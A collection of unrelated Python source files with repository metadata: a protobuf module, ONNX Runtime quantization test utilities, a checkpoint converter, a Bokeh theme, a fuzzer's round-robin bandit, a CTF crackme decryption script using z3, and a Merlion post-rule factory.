bec49adaeba661d8d0f03ac9935dc89f39d95a0d
|
refs/heads/main
| 2023-08-08T23:19:06.276643
| 2023-02-04T10:46:39
| 2023-02-04T10:46:39
| 203,558,879
| 192
| 58
|
Apache-2.0
| 2023-07-19T04:45:26
| 2019-08-21T10:12:47
|
Python
|
UTF-8
|
Python
| false
| true
| 3,553
|
py
|
aggregation_pb2.py
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: aggregation.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(
b'\n\x11\x61ggregation.proto\x12\x1e\x61\x65\x61.fetchai.aggregation.v0_2_7"\xaa\x03\n\x12\x41ggregationMessage\x12\x62\n\x0b\x61ggregation\x18\x05 \x01(\x0b\x32K.aea.fetchai.aggregation.v0_2_7.AggregationMessage.Aggregation_PerformativeH\x00\x12\x62\n\x0bobservation\x18\x06 \x01(\x0b\x32K.aea.fetchai.aggregation.v0_2_7.AggregationMessage.Observation_PerformativeH\x00\x1aZ\n\x18Observation_Performative\x12\r\n\x05value\x18\x01 \x01(\x03\x12\x0c\n\x04time\x18\x02 \x01(\t\x12\x0e\n\x06source\x18\x03 \x01(\t\x12\x11\n\tsignature\x18\x04 \x01(\t\x1a`\n\x18\x41ggregation_Performative\x12\r\n\x05value\x18\x01 \x01(\x03\x12\x0c\n\x04time\x18\x02 \x01(\t\x12\x14\n\x0c\x63ontributors\x18\x03 \x03(\t\x12\x11\n\tsignature\x18\x04 \x01(\tB\x0e\n\x0cperformativeb\x06proto3'
)
_AGGREGATIONMESSAGE = DESCRIPTOR.message_types_by_name["AggregationMessage"]
_AGGREGATIONMESSAGE_OBSERVATION_PERFORMATIVE = _AGGREGATIONMESSAGE.nested_types_by_name[
"Observation_Performative"
]
_AGGREGATIONMESSAGE_AGGREGATION_PERFORMATIVE = _AGGREGATIONMESSAGE.nested_types_by_name[
"Aggregation_Performative"
]
AggregationMessage = _reflection.GeneratedProtocolMessageType(
"AggregationMessage",
(_message.Message,),
{
"Observation_Performative": _reflection.GeneratedProtocolMessageType(
"Observation_Performative",
(_message.Message,),
{
"DESCRIPTOR": _AGGREGATIONMESSAGE_OBSERVATION_PERFORMATIVE,
"__module__": "aggregation_pb2"
# @@protoc_insertion_point(class_scope:aea.fetchai.aggregation.v0_2_7.AggregationMessage.Observation_Performative)
},
),
"Aggregation_Performative": _reflection.GeneratedProtocolMessageType(
"Aggregation_Performative",
(_message.Message,),
{
"DESCRIPTOR": _AGGREGATIONMESSAGE_AGGREGATION_PERFORMATIVE,
"__module__": "aggregation_pb2"
# @@protoc_insertion_point(class_scope:aea.fetchai.aggregation.v0_2_7.AggregationMessage.Aggregation_Performative)
},
),
"DESCRIPTOR": _AGGREGATIONMESSAGE,
"__module__": "aggregation_pb2"
# @@protoc_insertion_point(class_scope:aea.fetchai.aggregation.v0_2_7.AggregationMessage)
},
)
_sym_db.RegisterMessage(AggregationMessage)
_sym_db.RegisterMessage(AggregationMessage.Observation_Performative)
_sym_db.RegisterMessage(AggregationMessage.Aggregation_Performative)
if _descriptor._USE_C_DESCRIPTORS == False:
DESCRIPTOR._options = None
_AGGREGATIONMESSAGE._serialized_start = 54
_AGGREGATIONMESSAGE._serialized_end = 480
_AGGREGATIONMESSAGE_OBSERVATION_PERFORMATIVE._serialized_start = 276
_AGGREGATIONMESSAGE_OBSERVATION_PERFORMATIVE._serialized_end = 366
_AGGREGATIONMESSAGE_AGGREGATION_PERFORMATIVE._serialized_start = 368
_AGGREGATIONMESSAGE_AGGREGATION_PERFORMATIVE._serialized_end = 464
# @@protoc_insertion_point(module_scope)
|
7ccd8e198077ce01c5f066281ed112895523b6dc
|
0f2b08b31fab269c77d4b14240b8746a3ba17d5e
|
/onnxruntime/test/python/quantization/op_test_utils.py
|
e94ac5c9615836b9f850b8ac13f9750238234bfb
|
[
"MIT"
] |
permissive
|
microsoft/onnxruntime
|
f75aa499496f4d0a07ab68ffa589d06f83b7db1d
|
5e747071be882efd6b54d7a7421042e68dcd6aff
|
refs/heads/main
| 2023-09-04T03:14:50.888927
| 2023-09-02T07:16:28
| 2023-09-02T07:16:28
| 156,939,672
| 9,912
| 2,451
|
MIT
| 2023-09-14T21:22:46
| 2018-11-10T02:22:53
|
C++
|
UTF-8
|
Python
| false
| false
| 17,361
|
py
|
op_test_utils.py
|
import uuid
from pathlib import Path
import numpy as np
import onnx
from onnx import TensorProto
from onnx.helper import float32_to_float8e4m3, np_dtype_to_tensor_dtype
from onnx.numpy_helper import float8e4m3_to_float32
from onnx.reference import ReferenceEvaluator
from onnx.reference import ops as onnx_ops
from onnx.reference.custom_element_types import float8e4m3fn, float8e4m3fnuz, float8e5m2, float8e5m2fnuz
from onnx.reference.op_run import OpRun
import onnxruntime
from onnxruntime.quantization import CalibrationDataReader
onnx_recent_enough = hasattr(OpRun, "infer_name")
if onnx_recent_enough:
# Test with ReferenceEvaluator requires PR https://github.com/onnx/onnx/pull/5408/.
# https://github.com/onnx/onnx/pull/5408
try:
from onnx.reference.op_run import to_array_extended
except ImportError:
to_array_extended = None
onnx_recent_enough = False
class QGemm(OpRun):
op_domain = "com.microsoft"
f8_types = {
TensorProto.FLOAT8E4M3FN,
TensorProto.FLOAT8E4M3FNUZ,
TensorProto.FLOAT8E5M2,
TensorProto.FLOAT8E5M2FNUZ,
}
def get_tensor_type(self, tensor: np.ndarray) -> int:
if tensor.dtype == float8e4m3fn and tensor.dtype.descr[0][0] == "e4m3fn":
return TensorProto.FLOAT8E4M3FN
if tensor.dtype == float8e4m3fnuz and tensor.dtype.descr[0][0] == "e4m3fnuz":
return TensorProto.FLOAT8E4M3FNUZ
if tensor.dtype == float8e5m2 and tensor.dtype.descr[0][0] == "e5m2":
return TensorProto.FLOAT8E5M2
if tensor.dtype == float8e5m2fnuz and tensor.dtype.descr[0][0] == "e5m2fnuz":
return TensorProto.FLOAT8E5M2FNUZ
return np_dtype_to_tensor_dtype(tensor.dtype)
def _run(
self,
A,
a_scale,
a_zero_point,
B,
b_scale,
b_zero_point,
C=None,
y_scale=None,
y_zero_point=None,
transA=0,
transB=0,
alpha=1.0,
):
if transA:
A = A.T
if transB:
B = B.T
a_type = self.get_tensor_type(a_zero_point)
b_type = self.get_tensor_type(b_zero_point)
y_type = self.get_tensor_type(y_zero_point)
if a_type == TensorProto.FLOAT8E4M3FN and b_type == TensorProto.FLOAT8E4M3FN:
a_scaled = (float8e4m3_to_float32(A).astype(float) - float8e4m3_to_float32(a_zero_point)) * np.float32(
a_scale
)
b_scaled = (float8e4m3_to_float32(B).astype(float) - float8e4m3_to_float32(b_zero_point)) * np.float32(
b_scale
)
y = a_scaled @ b_scaled * np.float32(alpha)
if C is not None:
dtype = self.get_tensor_type(C)
if dtype not in (TensorProto.FLOAT, TensorProto.FLOAT16):
raise TypeError(f"C.dtype must be float16 or float 32 not {dtype}.")
y += C.astype(np.float32)
if y_scale is not None:
y /= y_scale
if y_zero_point is not None:
y += float8e4m3_to_float32(y_zero_point)
ry = y.ravel()
fy = np.empty(ry.shape, dtype=float8e4m3fn)
for i in range(fy.shape[0]):
el = float32_to_float8e4m3(ry[i]) # type: ignore[assignment]
fy[i] = el
y = fy.reshape(y.shape)
else:
raise NotImplementedError("y_zero_point is not empty. QGemm is not implemented in that case.")
return (y,)
elif a_type in self.f8_types or b_type in self.f8_types or y_type in self.f8_types:
raise NotImplementedError(f"QGemm not implemented for zero_types {a_type}, {b_type}, {y_type}.")
else:
if TensorProto.FLOAT8E4M3FN in {a_type, b_type, y_type}:
raise TypeError(f"Unexpected type for A: {dtype}, B:{dtype} or Y:{dtype}.")
a_scaled = (A.astype(float) - a_zero_point) * np.float32(a_scale)
b_scaled = (B.astype(float) - b_zero_point) * np.float32(b_scale)
y = a_scaled @ b_scaled * np.float32(alpha)
if C is not None:
y += C * np.float32(a_scale) * np.float32(b_scale)
if y_scale is not None:
y /= np.float32(y_scale)
if y_zero_point is not None:
y += y_zero_point
if y_zero_point is not None:
dtype = y_zero_point.dtype
elif C is not None:
dtype = C.dtype
else:
dtype = A.dtype
y = np.rint(y)
if dtype == np.uint8:
y = np.clip(y, 0, 255)
elif dtype == np.int8:
y = np.clip(y, -128, 127)
else:
raise ValueError(f"Unexpected dtype={dtype}, it should be uint8 or int8.")
return (y.astype(dtype),)
class TestDataFeeds(CalibrationDataReader):
def __init__(self, data_feeds):
"""
parameter data_feeds: list of input feed, each input feed is diction of {input_name: np_array}
"""
self.data_feeds = data_feeds
self.iter_next = iter(self.data_feeds)
def get_next(self):
return next(self.iter_next, None)
def rewind(self):
self.iter_next = iter(self.data_feeds)
def input_feeds_neg_one_zero_one(n, name2shape):
"""
randomize n feed according to shape, its values are from -1, 0, and 1
"""
input_data_list = []
for _i in range(n):
inputs = {}
for name, shape in name2shape.items():
inputs.update({name: np.random.randint(-1, 2, shape).astype(np.float32)})
input_data_list.extend([inputs])
dr = TestDataFeeds(input_data_list)
return dr
def check_op_type_order(testcase, model_to_check, ops):
if isinstance(model_to_check, str):
model = onnx.load(model_to_check)
elif isinstance(model_to_check, onnx.ModelProto):
model = model_to_check
testcase.assertEqual(len(ops), len(model.graph.node), "op count is not same")
for node_idx, node in enumerate(model.graph.node):
testcase.assertEqual(
ops[node_idx],
node.op_type,
f"op {node_idx} is not in order. Expected: {ops[node_idx]}, Actual: {node.op_type}",
)
def check_op_type_count(testcase, model_path, **kwargs):
model = onnx.load(Path(model_path))
optype2count = {}
for op_type in kwargs:
optype2count[op_type] = 0
for node in model.graph.node:
if node.op_type in optype2count:
optype2count[node.op_type] += 1
for op_type in kwargs:
testcase.assertEqual(
kwargs[op_type],
optype2count[op_type],
f"op_type {op_type} count not same",
)
def check_sign_f8_quantization(model_path_origin, model_path_to_check):
"""
Quantization to float 8 type does not change the sign as zero_point is always null.
This function checks that the quantized parameters did not change.
"""
with open(model_path_origin, "rb") as f:
model = onnx.load(f)
names = {init.name: init for init in model.graph.initializer}
with open(model_path_to_check, "rb") as f:
model_f8 = onnx.load(f)
names_f8 = {init.name: init for init in model_f8.graph.initializer}
for init in model_f8.graph.initializer:
if not init.name.endswith("_quantized"):
continue
name = init.name.replace("_quantized", "")
if name not in names:
raise AssertionError(f"Unable to find {name!r} in {set(names)}.")
scale_zp = [i.name for i in model_f8.graph.initializer if i.name.startswith(name)]
if len(scale_zp) not in (1, 3):
raise AssertionError(
f"Need one or three names not {scale_zp}, all names: {set(i.name for i in model_f8.graph.initializer)}."
)
scale = [name for name in scale_zp if "scale" in name]
zero = [name for name in scale_zp if "zero" in name]
if len(scale_zp) == 3:
if len(scale) != 1:
raise AssertionError(f"Need one name not {scale}.")
if len(zero) != 1:
raise AssertionError(f"Need one name not {zero}.")
else:
if len(scale) != 0:
raise AssertionError(f"No scale is expected but has {scale}.")
if len(zero) != 0:
raise AssertionError(f"No zero is expected but has {zero}.")
expected_sign = onnx.numpy_helper.to_array(names[name]) >= 0
if "bias" in init.name:
if init.data_type >= 17:
raise AssertionError(f"bias {init.name!r} should be float 16 not {init.data_type}.")
continue
if init.data_type < 17:
raise AssertionError(f"Initializer {init.name!r} not a float 8 type.")
raw = np.array([int(i) for i in init.raw_data])
got_sign = raw <= 128
try:
np.testing.assert_allclose(expected_sign.ravel(), got_sign)
except AssertionError as e:
scale_value = onnx.numpy_helper.to_array(names_f8[scale[0]])
err_msg = f"Sign are different for {name!r}, scale={scale_value}."
if to_array_extended is not None:
values = onnx.numpy_helper.to_array(names[name]).flatten()
f8_values = to_array_extended(init)
zero = onnx_ops.op_cast.Cast_19.eval(np.array(0), to=init.data_type)
dq = onnx_ops.op_dequantize_linear.DequantizeLinear.eval(f8_values, scale_value, zero).flatten()
q = onnx_ops.op_quantize_linear.QuantizeLinear_19.eval(values, scale_value, zero).flatten()
qdq = onnx_ops.op_dequantize_linear.DequantizeLinear.eval(q, scale_value, zero).flatten()
err_msg = (
f"{err_msg}\nvalues={values[:20]}\nqu={f8_values.flatten()[:20]}"
f"\n{q.flatten()[:20]}\ndq={dq[:20]}\nqdq={qdq[:20]}"
)
raise AssertionError(err_msg) from e
def check_model_correctness(
testcase,
model_path_origin,
model_path_to_check,
inputs,
rtol=1e-2,
atol=0.05,
providers=None,
dynamic=False,
is_gemm=False,
):
if providers is None:
providers = ["CPUExecutionProvider"]
sess_options = onnxruntime.SessionOptions()
sess_options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_DISABLE_ALL
sess_options.optimized_model_filepath = model_path_to_check + ".optimized.onnx"
origin_sess = onnxruntime.InferenceSession(model_path_origin, sess_options=sess_options, providers=providers)
origin_results = origin_sess.run(None, inputs)
with open(model_path_origin, "rb") as f:
model_onnx = onnx.load(f)
ops_set = set(node.op_type for node in model_onnx.graph.node)
check_reference_evaluator = not (ops_set & {"EmbedLayerNormalization", "Conv", "Attention", "Transpose"})
if check_reference_evaluator and onnx_recent_enough:
ref = ReferenceEvaluator(model_path_origin)
ref_origin_results = ref.run(None, inputs)
for idx, ref_output in enumerate(origin_results):
output = ref_origin_results[idx]
np.testing.assert_allclose(
ref_output,
output,
rtol=rtol,
atol=atol,
err_msg=f"Model {model_path_to_check!r} failed for providers={providers!r}.",
)
# Verifies the shapes in the quantized model.
if is_gemm:
expected_shapes = {}
with open(model_path_origin, "rb") as f:
model = onnx.load(f)
for init in model.graph.initializer:
expected_shapes[init.name] = tuple(init.dims)
checked = 0
f8_quantization = False
with open(model_path_to_check, "rb") as f:
model_check = onnx.load(f)
for init in model_check.graph.initializer:
if init.name.endswith("_quantized"):
name = init.name.replace("_quantized", "")
expected = expected_shapes[name]
shape = tuple(init.dims)
if not dynamic and expected != shape:
raise AssertionError(
f"Shape mismatch for initializer {init.name!r} from {init.name!r}, "
f"shape={shape} != {expected} (expected)."
)
else:
checked += 1
if "zero_point" in init.name:
dt = init.data_type
f8_quantization = f8_quantization or dt in (
TensorProto.FLOAT8E4M3FN,
TensorProto.FLOAT8E4M3FNUZ,
TensorProto.FLOAT8E5M2,
TensorProto.FLOAT8E5M2FNUZ,
)
if checked == 0:
raise AssertionError(
f"Unable to check expected shape, expected_shapes={expected_shapes}, "
f"names={[init.name for init in model_check.graph.initializer]}."
)
if f8_quantization:
check_sign_f8_quantization(model_path_origin, model_path_to_check)
# Verifies the expected outputs.
if check_reference_evaluator and onnx_recent_enough:
# Needs pv.Version(onnx.__version__) >= pv.Version("1.16.0")
ref = ReferenceEvaluator(model_path_to_check, new_ops=[QGemm])
target_results = ref.run(None, inputs)
testcase.assertEqual(len(origin_results), len(target_results), "result count are different")
for idx, ref_output in enumerate(origin_results):
output = target_results[idx]
np.testing.assert_allclose(
ref_output,
output,
rtol=rtol,
atol=atol,
err_msg=f"Model {model_path_to_check!r} failed for providers={providers!r}.",
)
# enable QDQ transformers
# sess_options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
target_sess = onnxruntime.InferenceSession(
model_path_to_check,
sess_options=sess_options,
providers=providers,
)
target_results = target_sess.run([], inputs)
testcase.assertEqual(len(origin_results), len(target_results), "result count are different")
for idx, ref_output in enumerate(origin_results):
output = target_results[idx]
np.testing.assert_allclose(
ref_output,
output,
rtol=rtol,
atol=atol,
err_msg=f"Model {model_path_to_check!r} failed for providers={providers!r}.",
)
def check_op_nodes(testcase, model_path, node_checker):
model = onnx.load(Path(model_path))
for node in model.graph.node:
testcase.assertTrue(node_checker(node))
def check_qtype_by_node_type(testcase, model_to_check, check_list):
if isinstance(model_to_check, str):
model = onnx.load(model_to_check)
elif isinstance(model_to_check, onnx.ModelProto):
model = model_to_check
model = onnx.shape_inference.infer_shapes(model)
value_infos = {vi.name: vi for vi in model.graph.value_info}
value_infos.update({ot.name: ot for ot in model.graph.output})
value_infos.update({it.name: it for it in model.graph.input})
initializers = {init.name: init for init in model.graph.initializer}
for node in model.graph.node:
if node.op_type in check_list:
input_output_check_list = check_list[node.op_type]
for check_item in input_output_check_list:
tensor_name = node.input[check_item[1]] if check_item[0] == "i" else node.output[check_item[1]]
testcase.assertTrue((tensor_name in value_infos) or (tensor_name in initializers))
if tensor_name in value_infos:
vi = value_infos[tensor_name]
testcase.assertTrue(vi.type.HasField("tensor_type"))
testcase.assertTrue(vi.type.tensor_type.elem_type == check_item[2])
else: # if (tensor_name in initializers):
init = initializers[tensor_name]
testcase.assertEqual(init.data_type, check_item[2])
def create_clip_node(input_name, output_name, node_name, initializers, min_value=-1.0, max_value=1.0):
clip_min_name = str(uuid.uuid4())
clip_max_name = str(uuid.uuid4())
clip_inputs = [input_name, clip_min_name, clip_max_name]
clip_outputs = [output_name]
clip_name = node_name
initializers.append(onnx.numpy_helper.from_array(np.array(min_value, dtype=np.float32), name=clip_min_name))
initializers.append(onnx.numpy_helper.from_array(np.array(max_value, dtype=np.float32), name=clip_max_name))
return onnx.helper.make_node("Clip", clip_inputs, clip_outputs, name=clip_name)
def generate_random_initializer(initializer_name, tensor_shape, tensor_dtype, mean=0.0, dev=0.3):
"""
Helper function to generate initializers for test inputs
"""
tensor = np.random.normal(mean, dev, tensor_shape).astype(tensor_dtype)
init = onnx.numpy_helper.from_array(tensor, initializer_name)
return init
|
dc35edc0e918238f3d78b3a3d0f25eb02971dea0
|
4ff11364a6dc59bd6bf7fb4efd868c7e45b1caab
|
/calamari_ocr/ocr/savedmodel/migrations/loadweights.py
|
87fcf504650453e7553603e58657e46955da88ed
|
[
"Apache-2.0"
] |
permissive
|
Calamari-OCR/calamari
|
6cf29512e71025b90807462b452595abe94cb8f3
|
2f71b7eb08339d25ccb21d80c1d5b851f3d5bdaa
|
refs/heads/master
| 2023-08-22T05:34:23.008839
| 2023-08-18T11:01:23
| 2023-08-18T11:01:23
| 126,039,059
| 1,019
| 245
|
Apache-2.0
| 2023-09-05T09:30:58
| 2018-03-20T15:22:29
|
Python
|
UTF-8
|
Python
| false
| false
| 1,426
|
py
|
loadweights.py
|
def load_and_convert_weights(ckpt, dry_run=True):
import tensorflow as tf
tf.compat.v1.reset_default_graph()
with tf.compat.v1.Session() as sess:
available_vars = tf.compat.v1.train.list_variables(ckpt)
available_var_names = [var_name for var_name, _ in available_vars]
for var_name in available_var_names:
var = tf.compat.v1.train.load_variable(ckpt, var_name)
# bias and kernel changed, unfortunately I do not know how to transform it...
if var_name.endswith("_lstm/kernel"):
rec_size = var.shape[1] // 4
# this split into recurrent kernel should be valid
kernel = var[:-rec_size]
rec_kernel = var[-rec_size:]
tf.Variable(kernel, name=var_name)
tf.Variable(rec_kernel, name=var_name.replace("kernel", "recurrent_kernel"))
elif var_name.endswith("_lstm/bias"):
# this might be required
dims = len(var) // 4
var[dims : dims * 2] += 1
tf.Variable(var, name=var_name)
else:
tf.Variable(var, name=var_name)
if not dry_run:
# Save the variables
saver = tf.compat.v1.train.Saver()
sess.run(tf.compat.v1.global_variables_initializer())
saver.save(sess, ckpt)
tf.compat.v1.reset_default_graph()
|
6c3294301212b1fb9400e982b477916c07e18036
|
5105403f2b75990654519438d8ceabcf80962ebf
|
/src/bokeh/themes/_night_sky.py
|
470ed6dcf0ab20ead3d2865d376d152764bc551b
|
[
"BSD-3-Clause"
] |
permissive
|
bokeh/bokeh
|
ed1d81eb07d27d27c6710c9fec9114886047f528
|
310cb2cbeabc4c4b8180cbda566df16039737cdc
|
refs/heads/branch-3.3
| 2023-08-31T23:53:06.537061
| 2023-08-30T03:43:05
| 2023-08-30T03:43:05
| 3,834,332
| 17,174
| 5,251
|
BSD-3-Clause
| 2023-09-14T11:37:23
| 2012-03-26T15:40:01
|
Python
|
UTF-8
|
Python
| false
| false
| 2,382
|
py
|
_night_sky.py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2023, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
json = {
"attrs": {
"Plot": {
"background_fill_color": "#2C001E",
"border_fill_color": "#15191C",
"outline_line_color": "#E0E0E0",
"outline_line_alpha": 0.25,
},
"Grid": {
"grid_line_color": "#E0E0E0",
"grid_line_alpha": 0.25,
},
"Axis": {
"major_tick_line_alpha": 0,
"major_tick_line_color": "#E0E0E0",
"minor_tick_line_alpha": 0,
"minor_tick_line_color": "#E0E0E0",
"axis_line_alpha": 0,
"axis_line_color": "#E0E0E0",
"major_label_text_color": "#E0E0E0",
"major_label_text_font": "Helvetica",
"major_label_text_font_size": "1.025em",
"axis_label_standoff": 10,
"axis_label_text_color": "#E0E0E0",
"axis_label_text_font": "Helvetica",
"axis_label_text_font_size": "1.25em",
"axis_label_text_font_style": "normal",
},
"Legend": {
"spacing": 8,
"glyph_width": 15,
"label_standoff": 8,
"label_text_color": "#E0E0E0",
"label_text_font": "Helvetica",
"label_text_font_size": "1.025em",
"border_line_alpha": 0,
"background_fill_alpha": 0.25,
"background_fill_color": "#2C001E",
},
"BaseColorBar": {
"title_text_color": "#E0E0E0",
"title_text_font": "Helvetica",
"title_text_font_size": "1.025em",
"title_text_font_style": "normal",
"major_label_text_color": "#E0E0E0",
"major_label_text_font": "Helvetica",
"major_label_text_font_size": "1.025em",
"background_fill_color": "#15191C",
"major_tick_line_alpha": 0,
"bar_line_alpha": 0,
},
"Title": {
"text_color": "#E0E0E0",
"text_font": "Helvetica",
"text_font_size": "1.15em",
},
},
}
|
6342792b9fd00a2cdf78aadf6395c2886a45b9fb
|
26bbcfdb811f7df13f7b5a95ba551da7adac4e9b
|
/src/certfuzz/scoring/multiarmed_bandit/round_robin_bandit.py
|
68da68ce5f1c0c85df89501f725e70daf11b8398
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
CERTCC/certfuzz
|
080c3a5448a39d02049253fad96498ba50191586
|
892dae8676535b0ae5b77eea95ffbc21e9e1c959
|
refs/heads/develop
| 2022-11-11T06:12:09.032184
| 2020-06-10T19:57:26
| 2020-06-10T19:57:26
| 20,684,363
| 161
| 25
|
NOASSERTION
| 2023-05-10T14:27:00
| 2014-06-10T12:29:53
|
Python
|
UTF-8
|
Python
| false
| false
| 362
|
py
|
round_robin_bandit.py
|
'''
Created on Jan 10, 2014
@author: adh
'''
import itertools
from certfuzz.scoring.multiarmed_bandit.multiarmed_bandit_base import MultiArmedBanditBase
class RoundRobinMultiArmedBandit(MultiArmedBanditBase):
def __iter__(self):
'''
Implements a simple round robin iterator
'''
return itertools.cycle(self.things.values())
|
a9f7a2806bc76b7f11976affe1b8d273c897a0cd
|
e2b9f2354c36bd1edfa141d29f60c13ea176c0fe
|
/2017/bostonkeyparty/qtcrackme.py
|
283ce4a8265db98d95a386ddfde7736ada00e748
|
[] |
no_license
|
Jinmo/ctfs
|
236d2c9c5a49d500e80ece4631a22c7fb32c3c3f
|
d225baef7942250a5ff15a3f2a9b7ad8501c7566
|
refs/heads/master
| 2021-07-24T15:17:05.489163
| 2021-07-05T16:05:15
| 2021-07-05T16:05:15
| 68,125,231
| 162
| 26
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,361
|
py
|
qtcrackme.py
|
import numpy as np
from numpy.linalg import inv as inv_matrix # really???
from z3 import *
ciphertext = [342868586L, 276196100L, 719703660L, 771095780L, 607388058L, 526903709L, 1078504063L, 1277609804L, 380802638L, 328226818L, 869243743L, 752195599L, 503103844L, 346660259L, 739251810L, 732552923L]
key = [37087L, 28860L, 61271L, 23190L, 53230L, 21769L, 32974L, 3360L, 57679L, 1806L, 42054L, 12230L, 60656L, 21333L, 30763L, 25687L]
key2 = [4992L, 9722L, 3242L, 226L, 1252L, 22234L, 6753L, 4671L, 9993L, 259L, 3591L, 192L, 8245L, 5425L, 32L, 3527L]
key3 = [2282688058L, 383276719L, 93319952L, 3639096956L]
key3 = [key3[0] | (key3[1] << 32), key3[2] | (key3[3] << 32)]
rol = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
# Rotate right: 0b1001 --> 0b1100
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
concat = lambda x: sum([a << ((len(x) - b - 1) * 16) for a, b in zip(x, range(0, len(x)))])
mask = 2 ** 64 - 1
mask16 = 2 ** 16 - 1
def minor(matrix,i):
"""Returns the Minor M_0i of matrix"""
minor = matrix
del minor[0] #Delete first row
for b in list(range(len(matrix))): #Delete column i
del minor[b][i]
return minor
def det(A):
"""Recursive function to find determinant"""
if len(A) == 1: #Base case on which recursion ends
return A[0][0]
else:
determinant = 0
for x in list(range(len(A))): #Iterates along first row finding cofactors
print("A:", A)
determinant += A[0][x] * (-1)**(2+x) * det(minor(A,x)) #Adds successive elements times their cofactors
print("determinant:", determinant)
return determinant
def encrypt(input):
global concat, key3
s = [a ^ b for a, b in zip(input, key)]
s = [concat(s[i:i+4]) for i in range(0, len(s), 4)]
print map(hex, s)
for i in range(2):
key3_ = list(key3)
a = s[i*2]
b = s[i*2+1]
for j in range(32):
a = (key3_[1] ^ (ror(a, 8, 64) + b)) & mask
b = (rol(b, 3, 64) ^ a) & mask
# keystream
key3_[0] = (j ^ (ror(key3_[0], 8, 64) + key3_[1])) & mask
key3_[1] = (rol(key3_[1], 3, 64) ^ key3_[0]) & mask
print hex(a), hex(b)
s[i*2], s[i*2+1] = a, b
# print map(hex, s)
s2 = []
for c in s:
s2.append((c >> 48) & mask16)
s2.append((c >> 32) & mask16)
s2.append((c >> 16) & mask16)
s2.append(c & mask16)
# print map(hex, s2)
s3 = [None] * 16
for i in range(4):
for j in range(4):
s3[j*4+i] = key2[j*4+0] * s2[i] + key2[j*4+1] * s2[i+4] + key2[j*4+2] * s2[i+8] + key2[j*4+3] * s2[i+12]
if s3[j*4+i] > 2**32:
print 'wtf'
exit()
# print map(hex, s3)
# print map(hex, ciphertext)
return s3
def decrypt(input):
global concat, key3, key2, mask
s2 = [Int('s2[%d]' % i) for i in range(16)]
s3 = [None] * 16
for i in range(4):
for j in range(4):
s3[j*4+i] = key2[j*4+0] * s2[i] + key2[j*4+1] * s2[i+4] + key2[j*4+2] * s2[i+8] + key2[j*4+3] * s2[i+12]
solver = Solver()
for i in range(16):
solver.add(s3[i] == input[i])
if solver.check() == unsat:
print 'wtf'
exit()
s2 = [solver.model()[s2[i]] for i in range(16)]
s2 = map(lambda x: x.as_long(), s2)
print map(hex, s2)
s = [concat(s2[i:i+4]) for i in range(0, len(s2), 4)]
for i in range(2):
key3_ = list(key3)
keys = []
for j in range(32):
# keystream
keys.append([key3_[0], key3_[1]])
key3_[0] = (j ^ (ror(key3_[0], 8, 64) + key3_[1])) & mask
key3_[1] = (rol(key3_[1], 3, 64) ^ key3_[0]) & mask
a = s[i*2]
b = s[i*2+1]
for j in range(32):
print hex(a), hex(b)
b = (ror(b ^ a, 3, 64)) & mask
a = ((rol((keys[-1 - j][1] ^ a) - b, 8, 64))) & mask
s[i*2], s[i*2+1] = a, b
plaintext = []
for c in s:
plaintext.append((c >> 48) & mask16)
plaintext.append((c >> 32) & mask16)
plaintext.append((c >> 16) & mask16)
plaintext.append(c & mask16)
plaintext = [a ^ b for a, b in zip(plaintext, key)]
print plaintext
# print map(hex, s)
mask = 2 ** 64 - 1
# print map(hex, s3)
# print map(hex, ciphertext)
return str(bytearray(plaintext))
assert concat([1, 2, 3, 4, 5, 6, 7, 8]) == 0x10002000300040005000600070008
input = 'JINMO123JINMO123'
input = bytearray(input)
decrypt(encrypt(input))
print '=' * 500
print decrypt(ciphertext)
|
12e27fe20d6953ebabeced7bf665b59b0d34740e
|
091e40b7cc9ac83d30e860603b4c8cdc785b77ee
|
/merlion/post_process/factory.py
|
e2216ddc8b58d4497bc59e7fa0e179475b918418
|
[
"BSD-3-Clause"
] |
permissive
|
salesforce/Merlion
|
b7a75326cd05883285f25ff856c89dc80570e602
|
01c3fc3406ebf19798cedcddbe829ae5339e1424
|
refs/heads/main
| 2023-04-10T02:25:43.959522
| 2023-03-22T18:39:54
| 2023-03-22T18:39:54
| 390,401,992
| 2,905
| 268
|
BSD-3-Clause
| 2023-03-22T18:39:56
| 2021-07-28T15:30:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,283
|
py
|
factory.py
|
#
# Copyright (c) 2023 salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
"""
Contains the `PostRuleFactory`.
"""
from typing import Type
from merlion.post_process.base import PostRuleBase
from merlion.utils import dynamic_import
import_alias = dict(
Threshold="merlion.post_process.threshold:Threshold",
AggregateAlarms="merlion.post_process.threshold:AggregateAlarms",
AdaptiveThreshold="merlion.post_process.threshold:AdaptiveThreshold",
AdaptiveAggregateAlarms="merlion.post_process.threshold:AdaptiveAggregateAlarms",
AnomScoreCalibrator="merlion.post_process.calibrate:AnomScoreCalibrator",
PostRuleSequence="merlion.post_process.sequence:PostRuleSequence",
)
class PostRuleFactory(object):
@classmethod
def get_post_rule_class(cls, name: str) -> Type[PostRuleBase]:
return dynamic_import(name, import_alias)
@classmethod
def create(cls, name: str, **kwargs) -> PostRuleBase:
"""
Uses the given ``kwargs`` to create a post-rule of the given name
"""
post_rule_class = cls.get_post_rule_class(name)
return post_rule_class.from_dict(kwargs)
|
6326306f769cfb88f5f70284d6252a2b664875b0
|
